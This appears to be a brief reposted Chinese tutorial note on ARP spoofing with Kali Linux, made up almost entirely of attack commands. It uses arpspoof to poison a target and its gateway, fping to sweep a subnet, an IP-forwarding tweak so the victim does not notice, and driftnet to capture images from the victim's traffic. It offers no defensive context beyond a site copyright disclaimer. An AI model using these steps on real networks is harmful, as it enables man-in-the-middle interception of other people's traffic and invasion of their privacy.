kali之ARP欺骗


arpspoof -i kali网卡 -t 目标ip 网关
ifconfig得到网关,网卡eth0   
目标ip:192.168.216.131  网关:192.168.216.2   (ip route show)



看局域网ip   fping -asg 192.168.3.0/24


获取图片
arpspoof -i kali网卡 -t 目标ip 网关
进行ip流量转发 echo 1 >>proc/sys/net/ipv4/ip_forward    echo写命令不会有显示 成功欺骗,目标ip不会断网
driftnet  --》获取本机网卡的图片  
driftnet -i eth0



查看Ubuntu网关 ip route show


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM